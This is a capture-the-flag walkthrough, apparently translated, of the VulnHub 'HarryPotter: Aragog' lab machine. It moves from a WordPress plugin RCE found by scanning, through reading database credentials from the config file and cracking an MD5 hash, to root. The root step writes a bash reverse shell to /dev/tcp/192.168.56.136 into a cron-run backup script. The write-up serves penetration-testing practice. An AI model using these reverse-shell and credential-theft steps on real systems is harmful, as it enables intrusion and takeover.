1. Target drone address:
HarryPotter: Aragog (1.0.2) ~ VulnHub
The first part of the Deathly Hallows trilogy, Aragog is the name of the spider raised by Hagrid, and it is also involved in the Chamber of Secrets.
2. Penetration process
Determine the target machine IP, attack machine IP, and scan the target machine’s open ports
There are only ports 22 and 80. We performed directory blasting on port 80 and found that it was the wordpress framework.
Here are tips, indicating that there are some exploitable points in wordpress plugins
View the source code, discover the domain name, open hosts, and bind the target IP to the domain name.
The next step is to use wpscan to scan and view. You need to add api-token here to scan out more things. You can register one on the official website yourself, and then copy your api-token and it will be ok.
wpscan --url http://192.168.56.143/blog --api-token=xxxxx -e p --plugins-detection aggressive
Just register for free WPScan: WordPress Security Scanner
Scan using command
I have heard a lot about it. There is RCE here. Just use it. You can check how to use this vulnerability. You can bounce the shell to Kali locally. You can also use msfconsole to attack and search for related modules.
Select 1, and then set the parameters
After it is fully set up, run
The attack was successful and the connection was established
Look at the uid, then enter the shell, turning it into an interactive shell
After some checking, I found a user, hagrid98, in which the first Horcrux existed. After checking, I found that it was base64 encoded.
Then decode it
RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets
This is Voldemort's diary
The next step is to escalate privileges. When WordPress is installed, there will be a default configuration file. After searching, I found the wordpress file. After entering, I saw the default configuration file. There is an account password in the configuration file.
Found the user and password of the database, entered the database to get useful information
Found the username and password, password md5 encryption, crack it
MD5 free online decryption crack_MD5 online encryption-SOMD5
Use ssh to remotely access this user. The connection is successful. I perform extraction operations with this user and find that there is nothing available.
Here we use an extraction auxiliary script for detection, start the web service locally, and use remote ssh to download the privilege escalation auxiliary script.
empower it
After execution, nothing much was discovered. Change to a privilege escalation auxiliary script
implement
The execution found a backup script, which performs backup operations for a period of time. The user attribute of the execution is root. Then directly write the following rebound shell code into this backup file.
echo 'bash -i >& /dev/tcp/192.168.56.136/7899 0>&1'>/opt/.backup.sh
Then execute the above backup script operation, monitor locally in kali, the rebound is successful, elevate the rights to root, and discover the second Horcrux.
There were two Horcruxes in the first part, and the infiltration has ended since then
3. Summary
To summarize the penetration of the target machine, the overall idea is to collect information and conduct vulnerability scanning on the frameworks that can be exploited. There are some small details in the middle, which are flexible and changeable. The overall idea remains the same. Finally, under the normal steps of elevating privileges, I ran out of ideas and used the privilege escalation auxiliary script to find the existing backup file. It is best to collect and detect privilege escalation information yourself. In the end, if there is no other way, use scripts for assistance.
The follow-up brings the second and third parts of Harry Potter and the Deathly Hallows!